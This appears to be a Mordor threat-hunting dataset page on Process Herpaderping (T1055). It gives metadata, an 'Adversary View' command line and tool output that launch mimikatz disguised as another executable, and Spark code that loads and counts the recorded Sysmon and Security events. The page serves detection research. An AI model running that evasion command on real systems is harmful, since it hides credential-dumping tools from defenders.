Process Herpaderping Mimikatz¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/10/26 |
Modification Date |
2020/10/26 |
Tactics |
|
Techniques |
[‘T1055’] |
Tags |
None |
Dataset Description¶
This dataset represents the execution of a Process Herpaderping to obscure the intentions of a process by modifying the content on disk after the image has been mapped.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
Adversary View¶
C:\Users\wardog>cd Desktop
C:\Users\wardog\Desktop>ProcessHerpaderping.exe mimikatz.exe wardog.exe C:\Windows\system32\SnippingTool.exe
Process Herpaderping Tool - Copyright (c) 2020 Johnny Shaw
[12140:10252][OK] Source File: "mimikatz.exe"
[12140:10252][OK] Target File: "wardog.exe"
[12140:10252][INFO] Copied source binary to target file
[12140:10252][INFO] Created image section for target
[12140:10252][INFO] Created process object, PID 8924
[12140:10252][INFO] Located target image entry RVA 0x000c3aec
[12140:10252][OK] Replacing target with "C:\Windows\system32\SnippingTool.exe"
[12140:10252][OK] Preparing target for execution
[12140:10252][INFO] Writing process parameters, remote PEB ProcessParameters 0x0000000000AED020
[12140:10252][INFO] Creating thread in process at entry point 0x00007FF733E63AEC
[12140:10252][INFO] Created thread, TID 12112
[12140:10252][OK] Waiting for herpaderped process to exit
[12140:10252][OK] Herpaderped process exited with code 0xc000013a
[12140:10252][OK] Process Herpaderp Succeeded
C:\Users\wardog\Desktop>
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+------------+------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10 |128 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7 |107 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13 |19 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12 |8 |
|WORKSTATION5|Security |4658 |4 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1 |3 |
|WORKSTATION5|Security |4688 |3 |
|WORKSTATION5|Security |4663 |2 |
|WORKSTATION5|Security |4673 |2 |
|WORKSTATION5|Security |4656 |2 |
|WORKSTATION5|Security |4690 |2 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11 |1 |
|WORKSTATION5|Security |1102 |1 |
+------------+------------------------------------+-------+-----+